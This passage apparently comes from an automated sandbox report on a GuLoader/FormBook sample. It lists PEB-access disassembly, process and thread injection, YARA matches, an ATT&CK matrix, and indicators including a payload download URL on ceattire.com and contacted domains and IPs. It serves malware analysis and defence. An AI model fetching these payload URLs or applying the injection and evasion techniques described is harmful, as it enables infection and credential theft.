Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1736CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E188EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1716E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1576E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E20131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E158794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E215BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E20138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1837F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E202073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E211074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1890AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E2014FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1CA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E167D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E183D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1735A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1C69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1D41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Thread register set: target process: 3388

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Code function: 1_2_02242183 cpuid

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

Yara detected Generic Dropper

Show sources

Source: Yara match

File source: Process Memory Space: ZGNX11JMSc.exe PID: 5880, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection211	Rootkit1	Credential API Hooking1	Security Software Discovery621	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion21	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection211	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol112	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	System Information Discovery311	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZGNX11JMSc.exe	21%	Virustotal		Browse
ZGNX11JMSc.exe	7%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ceattire.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://ceattire.com/bin_UYDMbHwI28.binI	0%	Avira URL Cloud	safe
http://ceattire.com/bin_UYDMbHwI28.bin	0%	Avira URL Cloud	safe
www.yellow-wink.com/nff/	0%	Avira URL Cloud	safe
http://ceattire.com/bin_UYDMbHwI28.binK	0%	Avira URL Cloud	safe
http://ceattire.com/o	0%	Avira URL Cloud	safe
http://ceattire.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.dating-web.site	64.190.62.111	true	false		unknown
ceattire.com	185.211.56.131	true	true	0%, Virustotal, Browse	unknown
137gate.com	31.44.185.28	true	false		unknown
gentrypartyof8.com	66.235.200.146	true	true		unknown
www.gentrypartyof8.com	unknown	unknown	true		unknown
www.automotivevita.com	unknown	unknown	true		unknown
www.bloomandbrewcafe.com	unknown	unknown	true		unknown
www.stonalogov.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ceattire.com/bin_UYDMbHwI28.bin	true	Avira URL Cloud: safe	unknown
www.yellow-wink.com/nff/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ceattire.com/bin_UYDMbHwI28.binI	ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ceattire.com/bin_UYDMbHwI28.binK	ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ceattire.com/o	ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ceattire.com/	ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
